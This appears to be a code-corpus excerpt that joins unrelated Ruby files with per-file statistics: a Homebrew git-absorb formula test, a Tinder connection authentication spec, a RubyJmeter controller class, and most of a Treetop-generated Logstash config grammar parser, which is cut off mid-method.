(zsh_completion/"_git-absorb").write Utils.safe_popen_read("#{bin}/git-absorb", "--gen-completions", "zsh")
(bash_completion/"git-absorb").write Utils.safe_popen_read("#{bin}/git-absorb", "--gen-completions", "bash")
(fish_completion/"git-absorb.fish").write Utils.safe_popen_read("#{bin}/git-absorb", "--gen-completions", "fish")
end
test do
(testpath/".gitconfig").write <<~EOS
[user]
name = Real Person
email = [email protected]
EOS
system "git", "init"
(testpath/"test").write "foo"
system "git", "add", "test"
system "git", "commit", "--message", "Initial commit"
(testpath/"test").delete
(testpath/"test").write "bar"
system "git", "add", "test"
system "git", "absorb"
end
end
| 37.934783 | 122 | 0.715186 |
91284003eff7cbb48b1f83711fda27028ae8403e | 1,246 | require 'spec_helper'
describe Tinder::Connection do
describe "authentication" do
it "should raise an exception with bad credentials" do
FakeWeb.register_uri(:get, "http://foo:[email protected]/rooms.json",
:status => ["401", "Unauthorized"])
connection = Tinder::Connection.new('test', :token => 'foo')
lambda { connection.get('/rooms.json') }.should raise_error(Tinder::AuthenticationFailed)
end
it "should lookup token when username/password provided" do
FakeWeb.register_uri(:get, "http://user:[email protected]/users/me.json",
:body => fixture('users/me.json'), :content_type => "application/json")
connection = Tinder::Connection.new('test', :username => 'user', :password => 'pass')
connection.token.should.should == "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
end
it "should use basic auth for credentials" do
FakeWeb.register_uri(:get, "http://mytoken:[email protected]/rooms.json",
:body => fixture('rooms.json'), :content_type => "application/json")
connection = Tinder::Connection.new('test', :token => 'mytoken')
lambda { connection.get('/rooms.json') }.should_not raise_error
end
end
end | 42.965517 | 95 | 0.674157 |
ab52f5fd6fad1a62bf8b72fa5caa268dc906e7f3 | 871 | module RubyJmeter
class DSL
def transaction_controller(params={}, &block)
node = RubyJmeter::TransactionController.new(params)
attach_node(node, &block)
end
end
class TransactionController
attr_accessor :doc
include Helper
def initialize(params={})
testname = params.kind_of?(Array) ? 'TransactionController' : (params[:name] || 'TransactionController')
@doc = Nokogiri::XML(<<-EOS.strip_heredoc)
<TransactionController guiclass="TransactionControllerGui" testclass="TransactionController" testname="#{testname}" enabled="true">
<boolProp name="TransactionController.parent">true</boolProp>
<boolProp name="TransactionController.includeTimers">false</boolProp>
</TransactionController>)
EOS
update params
update_at_xpath params if params.is_a?(Hash) && params[:update_at_xpath]
end
end
end
| 32.259259 | 131 | 0.729047 |
28bf5ab71cafb17af9116593cff208cf70064925 | 74,136 | # Autogenerated from a Treetop grammar. Edits may be lost.
require "treetop"
require "logstash/config/config_ast"
module LogStashConfig
include Treetop::Runtime
def root
@root ||= :config
end
module Config0
def _
elements[0]
end
def plugin_section
elements[1]
end
end
module Config1
def _1
elements[0]
end
def plugin_section
elements[1]
end
def _2
elements[2]
end
def _3
elements[4]
end
end
def _nt_config
start_index = index
if node_cache[:config].has_key?(index)
cached = node_cache[:config][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
r1 = _nt__
s0 << r1
if r1
r2 = _nt_plugin_section
s0 << r2
if r2
r3 = _nt__
s0 << r3
if r3
s4, i4 = [], index
loop do
i5, s5 = index, []
r6 = _nt__
s5 << r6
if r6
r7 = _nt_plugin_section
s5 << r7
end
if s5.last
r5 = instantiate_node(SyntaxNode,input, i5...index, s5)
r5.extend(Config0)
else
@index = i5
r5 = nil
end
if r5
s4 << r5
else
break
end
end
r4 = instantiate_node(SyntaxNode,input, i4...index, s4)
s0 << r4
if r4
r8 = _nt__
s0 << r8
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::Config,input, i0...index, s0)
r0.extend(Config1)
else
@index = i0
r0 = nil
end
node_cache[:config][start_index] = r0
r0
end
module Comment0
end
def _nt_comment
start_index = index
if node_cache[:comment].has_key?(index)
cached = node_cache[:comment][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
s0, i0 = [], index
loop do
i1, s1 = index, []
r3 = _nt_whitespace
if r3
r2 = r3
else
r2 = instantiate_node(SyntaxNode,input, index...index)
end
s1 << r2
if r2
if has_terminal?("#", false, index)
r4 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("#")
r4 = nil
end
s1 << r4
if r4
s5, i5 = [], index
loop do
if has_terminal?('\G[^\\r\\n]', true, index)
r6 = true
@index += 1
else
r6 = nil
end
if r6
s5 << r6
else
break
end
end
r5 = instantiate_node(SyntaxNode,input, i5...index, s5)
s1 << r5
if r5
if has_terminal?("\r", false, index)
r8 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("\r")
r8 = nil
end
if r8
r7 = r8
else
r7 = instantiate_node(SyntaxNode,input, index...index)
end
s1 << r7
if r7
if has_terminal?("\n", false, index)
r9 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("\n")
r9 = nil
end
s1 << r9
end
end
end
end
if s1.last
r1 = instantiate_node(SyntaxNode,input, i1...index, s1)
r1.extend(Comment0)
else
@index = i1
r1 = nil
end
if r1
s0 << r1
else
break
end
end
if s0.empty?
@index = i0
r0 = nil
else
r0 = instantiate_node(LogStash::Config::AST::Comment,input, i0...index, s0)
end
node_cache[:comment][start_index] = r0
r0
end
def _nt__
start_index = index
if node_cache[:_].has_key?(index)
cached = node_cache[:_][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
s0, i0 = [], index
loop do
i1 = index
r2 = _nt_comment
if r2
r1 = r2
else
r3 = _nt_whitespace
if r3
r1 = r3
else
@index = i1
r1 = nil
end
end
if r1
s0 << r1
else
break
end
end
r0 = instantiate_node(LogStash::Config::AST::Whitespace,input, i0...index, s0)
node_cache[:_][start_index] = r0
r0
end
def _nt_whitespace
start_index = index
if node_cache[:whitespace].has_key?(index)
cached = node_cache[:whitespace][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
s0, i0 = [], index
loop do
if has_terminal?('\G[ \\t\\r\\n]', true, index)
r1 = true
@index += 1
else
r1 = nil
end
if r1
s0 << r1
else
break
end
end
if s0.empty?
@index = i0
r0 = nil
else
r0 = instantiate_node(LogStash::Config::AST::Whitespace,input, i0...index, s0)
end
node_cache[:whitespace][start_index] = r0
r0
end
module PluginSection0
def branch_or_plugin
elements[0]
end
def _
elements[1]
end
end
module PluginSection1
def plugin_type
elements[0]
end
def _1
elements[1]
end
def _2
elements[3]
end
end
def _nt_plugin_section
start_index = index
if node_cache[:plugin_section].has_key?(index)
cached = node_cache[:plugin_section][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
r1 = _nt_plugin_type
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
if has_terminal?("{", false, index)
r3 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("{")
r3 = nil
end
s0 << r3
if r3
r4 = _nt__
s0 << r4
if r4
s5, i5 = [], index
loop do
i6, s6 = index, []
r7 = _nt_branch_or_plugin
s6 << r7
if r7
r8 = _nt__
s6 << r8
end
if s6.last
r6 = instantiate_node(SyntaxNode,input, i6...index, s6)
r6.extend(PluginSection0)
else
@index = i6
r6 = nil
end
if r6
s5 << r6
else
break
end
end
r5 = instantiate_node(SyntaxNode,input, i5...index, s5)
s0 << r5
if r5
if has_terminal?("}", false, index)
r9 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("}")
r9 = nil
end
s0 << r9
end
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::PluginSection,input, i0...index, s0)
r0.extend(PluginSection1)
else
@index = i0
r0 = nil
end
node_cache[:plugin_section][start_index] = r0
r0
end
def _nt_branch_or_plugin
start_index = index
if node_cache[:branch_or_plugin].has_key?(index)
cached = node_cache[:branch_or_plugin][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
r1 = _nt_branch
if r1
r0 = r1
else
r2 = _nt_plugin
if r2
r0 = r2
else
@index = i0
r0 = nil
end
end
node_cache[:branch_or_plugin][start_index] = r0
r0
end
def _nt_plugin_type
start_index = index
if node_cache[:plugin_type].has_key?(index)
cached = node_cache[:plugin_type][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
if has_terminal?("input", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 5))
@index += 5
else
terminal_parse_failure("input")
r1 = nil
end
if r1
r0 = r1
else
if has_terminal?("filter", false, index)
r2 = instantiate_node(SyntaxNode,input, index...(index + 6))
@index += 6
else
terminal_parse_failure("filter")
r2 = nil
end
if r2
r0 = r2
else
if has_terminal?("output", false, index)
r3 = instantiate_node(SyntaxNode,input, index...(index + 6))
@index += 6
else
terminal_parse_failure("output")
r3 = nil
end
if r3
r0 = r3
else
@index = i0
r0 = nil
end
end
end
node_cache[:plugin_type][start_index] = r0
r0
end
module Plugins0
def _
elements[0]
end
def plugin
elements[1]
end
end
module Plugins1
def plugin
elements[0]
end
end
def _nt_plugins
start_index = index
if node_cache[:plugins].has_key?(index)
cached = node_cache[:plugins][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i1, s1 = index, []
r2 = _nt_plugin
s1 << r2
if r2
s3, i3 = [], index
loop do
i4, s4 = index, []
r5 = _nt__
s4 << r5
if r5
r6 = _nt_plugin
s4 << r6
end
if s4.last
r4 = instantiate_node(SyntaxNode,input, i4...index, s4)
r4.extend(Plugins0)
else
@index = i4
r4 = nil
end
if r4
s3 << r4
else
break
end
end
r3 = instantiate_node(SyntaxNode,input, i3...index, s3)
s1 << r3
end
if s1.last
r1 = instantiate_node(SyntaxNode,input, i1...index, s1)
r1.extend(Plugins1)
else
@index = i1
r1 = nil
end
if r1
r0 = r1
else
r0 = instantiate_node(SyntaxNode,input, index...index)
end
node_cache[:plugins][start_index] = r0
r0
end
module Plugin0
def whitespace
elements[0]
end
def _
elements[1]
end
def attribute
elements[2]
end
end
module Plugin1
def attribute
elements[0]
end
end
module Plugin2
def name
elements[0]
end
def _1
elements[1]
end
def _2
elements[3]
end
def attributes
elements[4]
end
def _3
elements[5]
end
end
def _nt_plugin
start_index = index
if node_cache[:plugin].has_key?(index)
cached = node_cache[:plugin][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
r1 = _nt_name
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
if has_terminal?("{", false, index)
r3 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("{")
r3 = nil
end
s0 << r3
if r3
r4 = _nt__
s0 << r4
if r4
i6, s6 = index, []
r7 = _nt_attribute
s6 << r7
if r7
s8, i8 = [], index
loop do
i9, s9 = index, []
r10 = _nt_whitespace
s9 << r10
if r10
r11 = _nt__
s9 << r11
if r11
r12 = _nt_attribute
s9 << r12
end
end
if s9.last
r9 = instantiate_node(SyntaxNode,input, i9...index, s9)
r9.extend(Plugin0)
else
@index = i9
r9 = nil
end
if r9
s8 << r9
else
break
end
end
r8 = instantiate_node(SyntaxNode,input, i8...index, s8)
s6 << r8
end
if s6.last
r6 = instantiate_node(SyntaxNode,input, i6...index, s6)
r6.extend(Plugin1)
else
@index = i6
r6 = nil
end
if r6
r5 = r6
else
r5 = instantiate_node(SyntaxNode,input, index...index)
end
s0 << r5
if r5
r13 = _nt__
s0 << r13
if r13
if has_terminal?("}", false, index)
r14 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("}")
r14 = nil
end
s0 << r14
end
end
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::Plugin,input, i0...index, s0)
r0.extend(Plugin2)
else
@index = i0
r0 = nil
end
node_cache[:plugin][start_index] = r0
r0
end
def _nt_name
start_index = index
if node_cache[:name].has_key?(index)
cached = node_cache[:name][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
s1, i1 = [], index
loop do
if has_terminal?('\G[A-Za-z0-9_-]', true, index)
r2 = true
@index += 1
else
r2 = nil
end
if r2
s1 << r2
else
break
end
end
if s1.empty?
@index = i1
r1 = nil
else
r1 = instantiate_node(LogStash::Config::AST::Name,input, i1...index, s1)
end
if r1
r0 = r1
else
r3 = _nt_string
if r3
r0 = r3
else
@index = i0
r0 = nil
end
end
node_cache[:name][start_index] = r0
r0
end
module Attribute0
def name
elements[0]
end
def _1
elements[1]
end
def _2
elements[3]
end
def value
elements[4]
end
end
def _nt_attribute
start_index = index
if node_cache[:attribute].has_key?(index)
cached = node_cache[:attribute][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
r1 = _nt_name
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
if has_terminal?("=>", false, index)
r3 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("=>")
r3 = nil
end
s0 << r3
if r3
r4 = _nt__
s0 << r4
if r4
r5 = _nt_value
s0 << r5
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::Attribute,input, i0...index, s0)
r0.extend(Attribute0)
else
@index = i0
r0 = nil
end
node_cache[:attribute][start_index] = r0
r0
end
def _nt_value
start_index = index
if node_cache[:value].has_key?(index)
cached = node_cache[:value][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
r1 = _nt_plugin
if r1
r0 = r1
else
r2 = _nt_bareword
if r2
r0 = r2
else
r3 = _nt_string
if r3
r0 = r3
else
r4 = _nt_number
if r4
r0 = r4
else
r5 = _nt_array
if r5
r0 = r5
else
r6 = _nt_hash
if r6
r0 = r6
else
@index = i0
r0 = nil
end
end
end
end
end
end
node_cache[:value][start_index] = r0
r0
end
def _nt_array_value
start_index = index
if node_cache[:array_value].has_key?(index)
cached = node_cache[:array_value][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
r1 = _nt_bareword
if r1
r0 = r1
else
r2 = _nt_string
if r2
r0 = r2
else
r3 = _nt_number
if r3
r0 = r3
else
r4 = _nt_array
if r4
r0 = r4
else
r5 = _nt_hash
if r5
r0 = r5
else
@index = i0
r0 = nil
end
end
end
end
end
node_cache[:array_value][start_index] = r0
r0
end
module Bareword0
end
def _nt_bareword
start_index = index
if node_cache[:bareword].has_key?(index)
cached = node_cache[:bareword][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
if has_terminal?('\G[A-Za-z_]', true, index)
r1 = true
@index += 1
else
r1 = nil
end
s0 << r1
if r1
s2, i2 = [], index
loop do
if has_terminal?('\G[A-Za-z0-9_]', true, index)
r3 = true
@index += 1
else
r3 = nil
end
if r3
s2 << r3
else
break
end
end
if s2.empty?
@index = i2
r2 = nil
else
r2 = instantiate_node(SyntaxNode,input, i2...index, s2)
end
s0 << r2
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::Bareword,input, i0...index, s0)
r0.extend(Bareword0)
else
@index = i0
r0 = nil
end
node_cache[:bareword][start_index] = r0
r0
end
module DoubleQuotedString0
end
module DoubleQuotedString1
end
def _nt_double_quoted_string
start_index = index
if node_cache[:double_quoted_string].has_key?(index)
cached = node_cache[:double_quoted_string][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
if has_terminal?('"', false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure('"')
r1 = nil
end
s0 << r1
if r1
s2, i2 = [], index
loop do
i3 = index
if has_terminal?('\"', false, index)
r4 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure('\"')
r4 = nil
end
if r4
r3 = r4
else
i5, s5 = index, []
i6 = index
if has_terminal?('"', false, index)
r7 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure('"')
r7 = nil
end
if r7
r6 = nil
else
@index = i6
r6 = instantiate_node(SyntaxNode,input, index...index)
end
s5 << r6
if r6
if index < input_length
r8 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("any character")
r8 = nil
end
s5 << r8
end
if s5.last
r5 = instantiate_node(SyntaxNode,input, i5...index, s5)
r5.extend(DoubleQuotedString0)
else
@index = i5
r5 = nil
end
if r5
r3 = r5
else
@index = i3
r3 = nil
end
end
if r3
s2 << r3
else
break
end
end
r2 = instantiate_node(SyntaxNode,input, i2...index, s2)
s0 << r2
if r2
if has_terminal?('"', false, index)
r9 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure('"')
r9 = nil
end
s0 << r9
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::String,input, i0...index, s0)
r0.extend(DoubleQuotedString1)
else
@index = i0
r0 = nil
end
node_cache[:double_quoted_string][start_index] = r0
r0
end
module SingleQuotedString0
end
module SingleQuotedString1
end
def _nt_single_quoted_string
start_index = index
if node_cache[:single_quoted_string].has_key?(index)
cached = node_cache[:single_quoted_string][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
if has_terminal?("'", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("'")
r1 = nil
end
s0 << r1
if r1
s2, i2 = [], index
loop do
i3 = index
if has_terminal?("\\'", false, index)
r4 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("\\'")
r4 = nil
end
if r4
r3 = r4
else
i5, s5 = index, []
i6 = index
if has_terminal?("'", false, index)
r7 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("'")
r7 = nil
end
if r7
r6 = nil
else
@index = i6
r6 = instantiate_node(SyntaxNode,input, index...index)
end
s5 << r6
if r6
if index < input_length
r8 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("any character")
r8 = nil
end
s5 << r8
end
if s5.last
r5 = instantiate_node(SyntaxNode,input, i5...index, s5)
r5.extend(SingleQuotedString0)
else
@index = i5
r5 = nil
end
if r5
r3 = r5
else
@index = i3
r3 = nil
end
end
if r3
s2 << r3
else
break
end
end
r2 = instantiate_node(SyntaxNode,input, i2...index, s2)
s0 << r2
if r2
if has_terminal?("'", false, index)
r9 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("'")
r9 = nil
end
s0 << r9
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::String,input, i0...index, s0)
r0.extend(SingleQuotedString1)
else
@index = i0
r0 = nil
end
node_cache[:single_quoted_string][start_index] = r0
r0
end
def _nt_string
start_index = index
if node_cache[:string].has_key?(index)
cached = node_cache[:string][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
r1 = _nt_double_quoted_string
if r1
r0 = r1
else
r2 = _nt_single_quoted_string
if r2
r0 = r2
else
@index = i0
r0 = nil
end
end
node_cache[:string][start_index] = r0
r0
end
module Regexp0
end
module Regexp1
end
def _nt_regexp
start_index = index
if node_cache[:regexp].has_key?(index)
cached = node_cache[:regexp][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
if has_terminal?('/', false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure('/')
r1 = nil
end
s0 << r1
if r1
s2, i2 = [], index
loop do
i3 = index
if has_terminal?('\/', false, index)
r4 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure('\/')
r4 = nil
end
if r4
r3 = r4
else
i5, s5 = index, []
i6 = index
if has_terminal?('/', false, index)
r7 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure('/')
r7 = nil
end
if r7
r6 = nil
else
@index = i6
r6 = instantiate_node(SyntaxNode,input, index...index)
end
s5 << r6
if r6
if index < input_length
r8 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("any character")
r8 = nil
end
s5 << r8
end
if s5.last
r5 = instantiate_node(SyntaxNode,input, i5...index, s5)
r5.extend(Regexp0)
else
@index = i5
r5 = nil
end
if r5
r3 = r5
else
@index = i3
r3 = nil
end
end
if r3
s2 << r3
else
break
end
end
r2 = instantiate_node(SyntaxNode,input, i2...index, s2)
s0 << r2
if r2
if has_terminal?('/', false, index)
r9 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure('/')
r9 = nil
end
s0 << r9
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::RegExp,input, i0...index, s0)
r0.extend(Regexp1)
else
@index = i0
r0 = nil
end
node_cache[:regexp][start_index] = r0
r0
end
module Number0
end
module Number1
end
def _nt_number
start_index = index
if node_cache[:number].has_key?(index)
cached = node_cache[:number][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
if has_terminal?("-", false, index)
r2 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("-")
r2 = nil
end
if r2
r1 = r2
else
r1 = instantiate_node(SyntaxNode,input, index...index)
end
s0 << r1
if r1
s3, i3 = [], index
loop do
if has_terminal?('\G[0-9]', true, index)
r4 = true
@index += 1
else
r4 = nil
end
if r4
s3 << r4
else
break
end
end
if s3.empty?
@index = i3
r3 = nil
else
r3 = instantiate_node(SyntaxNode,input, i3...index, s3)
end
s0 << r3
if r3
i6, s6 = index, []
if has_terminal?(".", false, index)
r7 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure(".")
r7 = nil
end
s6 << r7
if r7
s8, i8 = [], index
loop do
if has_terminal?('\G[0-9]', true, index)
r9 = true
@index += 1
else
r9 = nil
end
if r9
s8 << r9
else
break
end
end
r8 = instantiate_node(SyntaxNode,input, i8...index, s8)
s6 << r8
end
if s6.last
r6 = instantiate_node(SyntaxNode,input, i6...index, s6)
r6.extend(Number0)
else
@index = i6
r6 = nil
end
if r6
r5 = r6
else
r5 = instantiate_node(SyntaxNode,input, index...index)
end
s0 << r5
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::Number,input, i0...index, s0)
r0.extend(Number1)
else
@index = i0
r0 = nil
end
node_cache[:number][start_index] = r0
r0
end
module Array0
def _1
elements[0]
end
def _2
elements[2]
end
def value
elements[3]
end
end
module Array1
def value
elements[0]
end
end
module Array2
def _1
elements[1]
end
def _2
elements[3]
end
end
def _nt_array
start_index = index
if node_cache[:array].has_key?(index)
cached = node_cache[:array][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
if has_terminal?("[", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("[")
r1 = nil
end
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
i4, s4 = index, []
r5 = _nt_value
s4 << r5
if r5
s6, i6 = [], index
loop do
i7, s7 = index, []
r8 = _nt__
s7 << r8
if r8
if has_terminal?(",", false, index)
r9 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure(",")
r9 = nil
end
s7 << r9
if r9
r10 = _nt__
s7 << r10
if r10
r11 = _nt_value
s7 << r11
end
end
end
if s7.last
r7 = instantiate_node(SyntaxNode,input, i7...index, s7)
r7.extend(Array0)
else
@index = i7
r7 = nil
end
if r7
s6 << r7
else
break
end
end
r6 = instantiate_node(SyntaxNode,input, i6...index, s6)
s4 << r6
end
if s4.last
r4 = instantiate_node(SyntaxNode,input, i4...index, s4)
r4.extend(Array1)
else
@index = i4
r4 = nil
end
if r4
r3 = r4
else
r3 = instantiate_node(SyntaxNode,input, index...index)
end
s0 << r3
if r3
r12 = _nt__
s0 << r12
if r12
if has_terminal?("]", false, index)
r13 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("]")
r13 = nil
end
s0 << r13
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::Array,input, i0...index, s0)
r0.extend(Array2)
else
@index = i0
r0 = nil
end
node_cache[:array][start_index] = r0
r0
end
module Hash0
def _1
elements[1]
end
def _2
elements[3]
end
end
def _nt_hash
start_index = index
if node_cache[:hash].has_key?(index)
cached = node_cache[:hash][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
if has_terminal?("{", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("{")
r1 = nil
end
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
r4 = _nt_hashentries
if r4
r3 = r4
else
r3 = instantiate_node(SyntaxNode,input, index...index)
end
s0 << r3
if r3
r5 = _nt__
s0 << r5
if r5
if has_terminal?("}", false, index)
r6 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("}")
r6 = nil
end
s0 << r6
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::Hash,input, i0...index, s0)
r0.extend(Hash0)
else
@index = i0
r0 = nil
end
node_cache[:hash][start_index] = r0
r0
end
module Hashentries0
def whitespace
elements[0]
end
def hashentry
elements[1]
end
end
module Hashentries1
def hashentry
elements[0]
end
end
def _nt_hashentries
start_index = index
if node_cache[:hashentries].has_key?(index)
cached = node_cache[:hashentries][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
r1 = _nt_hashentry
s0 << r1
if r1
s2, i2 = [], index
loop do
i3, s3 = index, []
r4 = _nt_whitespace
s3 << r4
if r4
r5 = _nt_hashentry
s3 << r5
end
if s3.last
r3 = instantiate_node(SyntaxNode,input, i3...index, s3)
r3.extend(Hashentries0)
else
@index = i3
r3 = nil
end
if r3
s2 << r3
else
break
end
end
r2 = instantiate_node(SyntaxNode,input, i2...index, s2)
s0 << r2
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::HashEntries,input, i0...index, s0)
r0.extend(Hashentries1)
else
@index = i0
r0 = nil
end
node_cache[:hashentries][start_index] = r0
r0
end
module Hashentry0
def name
elements[0]
end
def _1
elements[1]
end
def _2
elements[3]
end
def value
elements[4]
end
end
def _nt_hashentry
start_index = index
if node_cache[:hashentry].has_key?(index)
cached = node_cache[:hashentry][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
i1 = index
r2 = _nt_number
if r2
r1 = r2
else
r3 = _nt_bareword
if r3
r1 = r3
else
r4 = _nt_string
if r4
r1 = r4
else
@index = i1
r1 = nil
end
end
end
s0 << r1
if r1
r5 = _nt__
s0 << r5
if r5
if has_terminal?("=>", false, index)
r6 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("=>")
r6 = nil
end
s0 << r6
if r6
r7 = _nt__
s0 << r7
if r7
r8 = _nt_value
s0 << r8
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::HashEntry,input, i0...index, s0)
r0.extend(Hashentry0)
else
@index = i0
r0 = nil
end
node_cache[:hashentry][start_index] = r0
r0
end
module Branch0
def _
elements[0]
end
def else_if
elements[1]
end
end
module Branch1
def _
elements[0]
end
def else
elements[1]
end
end
module Branch2
def if
elements[0]
end
end
def _nt_branch
start_index = index
if node_cache[:branch].has_key?(index)
cached = node_cache[:branch][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
r1 = _nt_if
s0 << r1
if r1
s2, i2 = [], index
loop do
i3, s3 = index, []
r4 = _nt__
s3 << r4
if r4
r5 = _nt_else_if
s3 << r5
end
if s3.last
r3 = instantiate_node(SyntaxNode,input, i3...index, s3)
r3.extend(Branch0)
else
@index = i3
r3 = nil
end
if r3
s2 << r3
else
break
end
end
r2 = instantiate_node(SyntaxNode,input, i2...index, s2)
s0 << r2
if r2
i7, s7 = index, []
r8 = _nt__
s7 << r8
if r8
r9 = _nt_else
s7 << r9
end
if s7.last
r7 = instantiate_node(SyntaxNode,input, i7...index, s7)
r7.extend(Branch1)
else
@index = i7
r7 = nil
end
if r7
r6 = r7
else
r6 = instantiate_node(SyntaxNode,input, index...index)
end
s0 << r6
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::Branch,input, i0...index, s0)
r0.extend(Branch2)
else
@index = i0
r0 = nil
end
node_cache[:branch][start_index] = r0
r0
end
module If0
def branch_or_plugin
elements[0]
end
def _
elements[1]
end
end
module If1
def _1
elements[1]
end
def condition
elements[2]
end
def _2
elements[3]
end
def _3
elements[5]
end
end
def _nt_if
start_index = index
if node_cache[:if].has_key?(index)
cached = node_cache[:if][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
